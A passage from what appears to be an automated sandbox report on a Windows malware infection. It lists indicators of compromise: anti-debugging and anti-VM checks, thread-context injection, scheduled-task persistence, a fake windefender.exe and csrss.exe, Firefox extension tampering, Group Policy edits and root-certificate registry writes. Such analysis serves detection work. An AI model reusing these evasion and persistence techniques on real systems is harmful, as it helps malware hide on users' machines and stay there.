C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA KQwfUoo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E KQwfUoo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol puXYKqB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA KQwfUoo.exe File opened for modification C:\Windows\System32\GroupPolicy UeBGJdQZVUuurvvrtFOtjUqE.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini UeBGJdQZVUuurvvrtFOtjUqE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 KQwfUoo.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol UeBGJdQZVUuurvvrtFOtjUqE.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 KQwfUoo.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI UeBGJdQZVUuurvvrtFOtjUqE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 KQwfUoo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini puXYKqB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA KQwfUoo.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
UeBGJdQZVUuurvvrtFOtjUqE.exe2sK9qcVeMtm0aymJpbObEY9P.exepid Process 2636 UeBGJdQZVUuurvvrtFOtjUqE.exe 6032 2sK9qcVeMtm0aymJpbObEY9P.exe 6032 2sK9qcVeMtm0aymJpbObEY9P.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exeO0CPJ0FFbJ7m6QGvaPcCCRWK.exedescription pid Process procid_target PID 3300 set thread context of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 2244 set thread context of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
xS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exeGUfrwuhZbYaOvK64ZU92F4kb.exedescription ioc Process File opened (read-only) \??\VBoxMiniRdrDN xS3VUm3AkBIOCvlKG8AJkD7Z.exe File opened (read-only) \??\VBoxMiniRdrDN 1W7hBQbCXjFNhD9IQsfTupEb.exe File opened (read-only) \??\VBoxMiniRdrDN GUfrwuhZbYaOvK64ZU92F4kb.exe -
Drops file in Program Files directory 14 IoCs
Processes:
KQwfUoo.exedescription ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi KQwfUoo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja KQwfUoo.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\EXgRWGG.dll KQwfUoo.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml KQwfUoo.exe File created C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll KQwfUoo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi KQwfUoo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KQwfUoo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KQwfUoo.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\QWFyiZq.dll KQwfUoo.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml KQwfUoo.exe File created C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml KQwfUoo.exe File created C:\Program Files (x86)\LCifMpYymZWU2\HTMRMDKYbCyXN.dll KQwfUoo.exe File created C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml KQwfUoo.exe File created C:\Program Files (x86)\gbPxNkbXHfUn\lsTuwPS.dll KQwfUoo.exe -
Drops file in Windows directory 13 IoCs
Processes:
1W7hBQbCXjFNhD9IQsfTupEb.exeschtasks.exeschtasks.execsrss.exeschtasks.exeschtasks.exexS3VUm3AkBIOCvlKG8AJkD7Z.exeGUfrwuhZbYaOvK64ZU92F4kb.exeschtasks.exedescription ioc Process File opened for modification C:\Windows\rss 1W7hBQbCXjFNhD9IQsfTupEb.exe File created C:\Windows\rss\csrss.exe 1W7hBQbCXjFNhD9IQsfTupEb.exe File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job schtasks.exe File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job schtasks.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File opened for modification C:\Windows\rss xS3VUm3AkBIOCvlKG8AJkD7Z.exe File opened for modification C:\Windows\rss GUfrwuhZbYaOvK64ZU92F4kb.exe File created C:\Windows\rss\csrss.exe GUfrwuhZbYaOvK64ZU92F4kb.exe File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rss\csrss.exe xS3VUm3AkBIOCvlKG8AJkD7Z.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid Process 5920 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 2516 2244 WerFault.exe 87 2032 1108 WerFault.exe 90 2200 3092 WerFault.exe 86 2664 1108 WerFault.exe 90 5700 3636 WerFault.exe 97 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2dw.0.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2dw.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2dw.0.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 5232 schtasks.exe 6068 schtasks.exe 5616 schtasks.exe 876 schtasks.exe 1344 schtasks.exe 3488 schtasks.exe 5544 schtasks.exe 5440 schtasks.exe 4444 schtasks.exe 4516 schtasks.exe 2208 schtasks.exe 3176 schtasks.exe 3168 schtasks.exe 4872 schtasks.exe 5932 schtasks.exe 5368 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
rundll32.exeInstall.exeInstall.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
xS3VUm3AkBIOCvlKG8AJkD7Z.exepowershell.exepowershell.exepowershell.exepowershell.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeKQwfUoo.exepowershell.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-571 = "China Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ KQwfUoo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3142 = "South Sudan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer KQwfUoo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe -
Processes:
WZ5cX3pyFhvxZFq1AmkufeHv.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 WZ5cX3pyFhvxZFq1AmkufeHv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e WZ5cX3pyFhvxZFq1AmkufeHv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603